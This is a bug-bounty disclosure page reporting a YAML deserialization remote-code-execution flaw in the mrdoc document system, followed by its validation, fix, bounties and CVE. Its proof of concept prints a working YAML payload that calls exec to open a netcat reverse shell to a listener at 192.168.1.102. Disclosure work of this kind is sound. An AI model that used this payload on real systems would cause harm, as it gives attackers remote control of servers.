Deserialization of Untrusted Data in zmister2016/mrdoc

Valid

Reported on

Aug 29th 2021


✍️ Description

online document system developed based on python. It is suitable for individuals and small teams to manage documents, wiki, knowledge and notes. like gitbook this package is vulnerable for RCE due to Yaml.load in import function

🕵️‍♂️ Proof of Concept

Uploaded ZIp :

Payload.yaml :

!!python/object/new:type
 args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.102 8090 >/tmp/f')"

💥 Impact

This vulnerability is capable of RCE

Abdul muhaimin submitted a
a year ago
Abdul muhaimin
a year ago

Researcher


added a fix!

zmister2016 validated this vulnerability a year ago
Abdul muhaimin has been awarded the disclosure bounty
The fix bounty is now up for grabs
zmister2016 confirmed that a fix has been merged on bb49e1 a year ago
Abdul muhaimin has been awarded the fix bounty
Jamie Slome
a year ago

Admin


CVE published! 🎉

Abdul muhaimin
a year ago

Researcher


Cool 💯

to join this conversation